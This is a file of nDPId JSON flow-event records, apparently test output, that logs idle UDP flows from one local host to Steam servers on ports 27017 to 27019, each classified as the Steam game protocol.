+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165020,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164837,"flow_last_seen":1357332164869,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164787,"flow_last_seen":1357332164823,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165370,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165266,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164736,"flow_last_seen":1357332164761,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165375,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165137,"flow_last_seen":1357332165175,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165037,"flow_last_seen":1357332165075,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165027,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164927,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1357332165288,"flow_last_seen":1357332165983,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":992,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165277,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165226,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165125,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332164974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332164873,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165285,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165288,"flow_last_seen":1357332165310,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164912,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164886,"flow_last_seen":1357332164980,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164834,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165344,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165243,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332165017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165138,"flow_last_seen":1357332165291,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 